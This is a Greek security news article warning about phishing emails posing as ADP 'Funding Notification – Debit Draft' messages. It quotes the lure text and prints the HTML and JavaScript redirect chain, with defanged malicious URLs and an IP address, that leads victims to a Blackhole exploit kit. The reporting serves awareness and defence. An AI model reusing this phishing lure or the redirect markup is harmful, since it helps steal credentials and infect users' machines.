Ένα σφάλμα στο APT επιτρέπει την εγκατάσταση κακόβουλων πακέτων
infosec

Ένα σφάλμα στο APT επιτρέπει την εγκατάσταση κακόβουλων πακέτων

Ορισμένες δημοφιλείς διανομές Linux έχουν ένα σφάλμα στο package-management interface, το οποίο θα μπορούσε να χρησιμοποιήσει ένας εισβολέας για να...
Read More
infosec

15 ψεύτικες Google Play εφαρμογές εξαπάτησαν Android χρήστες

Νωρίτερα αυτόν τον μήνα, η Google απομάκρυνε 85 κακόβουλες εφαρμογές από το Google Play Store. Ειδικότερα, μία παράνομη adware εφαρμογή...
Read More
infosec

Facebook «10 Year Challenge»: Κινδυνεύουν πράγματι τα δεδομένα σας;

Το τελευταίο διάστημα όλοι παρατηρήσαμε το νέο trend «10-Year Challenge» σε Facebook και Instagram. Αφού έγινε η νέα τάση ανάμεσα...
Read More
infosec

Το Malwarebytes έλυσε το σφάλμα «freezing» των συσκευών Windows 7

Η ομάδα του Malwarebytes επιτέλους έδωσε λύση στο σφάλμα που προκαλούσε πάγωμα σε συσκευές Windows 7! Το πρόβλημα εντοπίστηκε νωρίτερα...
Read More
infosec

Κορυφαίες Android VPN εφαρμογές διαρρέουν προσωπικά δεδομένα

Σύμφωνα με μία νέα μελέτη από VPN αξιολογητές, πάνω από 25% των 150 πιο δημοφιλών και δωρεάν VPNs στο Google...
Read More
Latest Posts

Προσοχή σε μηνύματα ηλεκτρονικού ταχυδρομείου που αφορούν προειδοποιήσεις σχετικά με χρεώσεις

Ερευνητές του MX Lab, έχουν εντοπίσει κάποια μηνύματα ηλεκτρονικού ταχυδρομείου με θέμα “ ADP Funding Notification – Debit Draft”, τα οποία οδηγούν σε κακόβουλες ιστοσελίδες που περιέχουν ασαφές Javascript κώδικα.

Το email αποστέλλεται από ψεύτικες διευθύνσεις όπως “ADP_FSA_Services@ADP.com” ή “ADPClientServices@adp.com” και έχει το ακόλουθο περιεχόμενο: <…>

Your Transaction Report(s) have been uploaded to the web site:


https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services

 

Ο σύνδεσμος δεν μεταφέρει τον χρήστη στην ιστοσελίδα που αναφέρεται μέσα στο μήνυμα, αλλά στο hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html (Ελληνική ιστοσελίδα, όπου εκτελείται ο ακόλουθος HTML κώδικας:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<scripttype=”text/javascript” src=”hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js”></script>
<scripttype=”text/javascript” src=”hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js”></script>

</html>

 

Και τα δύο ενσωματωμένα Javascript URLs θα ανακατευθύνουν τον χρήστη στο document.location=’hxxp://173.255.228.171/getfile.php?u=853fda24′;

Μετά την αποσαφήνιση του κώδικα Javascript, οι ερευνητές ανακάλυψαν ένα Blackhole exploit pack που προσπαθεί να εκμεταλλευτεί κάποιο ευπαθές λογισμικό, όπως flash, pdf και άλλα για να αποκτήσει πρόσβαση στο σύστημα.

Έχετε άποψη; Αφήστε το σχόλιό σας.

Ο συντάκτης σας επιτρέπει να αντιγράψετε το κείμενό του, μόνο εφόσον αναφέρετε την πηγή (SecNews.gr), σαν ηλεκτρονική διεύθυνση (Live URL) του άρθρου.
Updated on by

Reader Interactions

Αφήστε μια απάντηση

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *